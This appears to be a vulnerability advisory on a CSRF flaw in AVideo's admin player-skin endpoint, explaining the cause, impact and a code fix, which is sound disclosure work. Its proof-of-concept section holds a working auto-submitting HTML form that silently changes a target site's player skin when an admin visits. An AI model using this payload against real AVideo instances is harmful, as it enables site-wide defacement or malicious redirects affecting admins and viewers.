AVideo, an open-source video sharing platform, exposes a cross-site request forgery (CSRF) vulnerability in its admin panel. Attackers can trick authenticated admins into changing the site’s player skin configuration platform-wide by visiting a malicious webpage. Rated medium severity (CWE-352), this flaw stems from missing CSRF token checks in admin/playerUpdate.json.php, combined with bypassed ORM protections and lax cookie settings.
The endpoint pulls the skin directly from POST data without validation: $pluginDO->skin = $_POST['skin']; (line 17). AVideo’s ORM normally enforces Referer/Origin checks for cross-origin writes, but developers explicitly call ignoreTableSecurityCheck() on the plugins table. This strips the last defense layer. Worse, session cookies use SameSite=None, so browsers send them in cross-origin POSTs automatically.
Vulnerability Mechanics
AVideo (also known as YouPHPTube) powers self-hosted video sites for creators avoiding Big Tech platforms. It handles uploads, streaming, and monetization, with over 10,000 GitHub stars and deployments worldwide. Admins customize the video player via plugins, including skins that control appearance across all videos.
Here, the attack exploits admin sessions. An attacker hosts a simple HTML page on their domain. When an admin visits—perhaps via phishing email or ad—the page fires a POST to /admin/playerUpdate.json.php with a new skin value. The browser attaches the session cookie, authenticating the request silently. No user interaction needed beyond loading the page.
Proof of Concept
Host this HTML on an attacker site:
<!DOCTYPE html>
<html>
<body>
<h1>CSRF Player Skin</h1>
<p>Loading video...</p>
<iframe src="https://target-site.com/v123" style="display:none;"></iframe>
<form id="csrf" action="https://target-site.com/admin/playerUpdate.json.php" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="skin" value="attacker-skin-url" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>The iframe loads a video to keep the admin engaged. On visit, the form submits, overwriting the skin. Test on a vulnerable AVideo instance (pre-fix, versions up to latest as of advisory).
Why This Matters
Player skins dictate how every video renders for all users—thumbnails, controls, overlays. An attacker sets a malicious skin with broken CSS, phishing links, or malware redirects. Disruptions halt playback; defacements erode trust. In a multi-tenant setup, one admin slip affects thousands.
Broadly, CSRF persists in legacy PHP apps like AVideo due to incomplete mitigations. SameSite=None enables it, as browsers prioritize compatibility over security. ORM bypasses signal rushed development—plugins need flexibility, but security suffers. Fair severity: requires admin access and social engineering, not remote code exec. Still, zero mitigations amplify risk.
AVideo's 100k+ downloads and active community (forks like WWBN/AVideo) mean widespread exposure. Self-hosters often skip updates; this hit production sites until patched.
Fix and Prevention
Add CSRF validation early in admin/playerUpdate.json.php:
// Before line 17
if (!isGlobalTokenValid()) {
die('{"error":"Invalid CSRF token"}');
}
$pluginDO->skin = $_POST['skin'];
Generate tokens via AVideo's session_start() and getToken(). Set cookies to SameSite=Strict or Lax. Re-enable ORM checks unless critical. Audit other ignoreTableSecurityCheck() calls—11 tables flagged in source.
Admins: Enable 2FA, restrict admin IPs, monitor plugin changes. Update to patched version post-advisory (check wwbn/avideo repo). Scan with tools like aisafe.io, which found this. In video platforms, UI tampering previews worse: next vuln could hit content or billing.
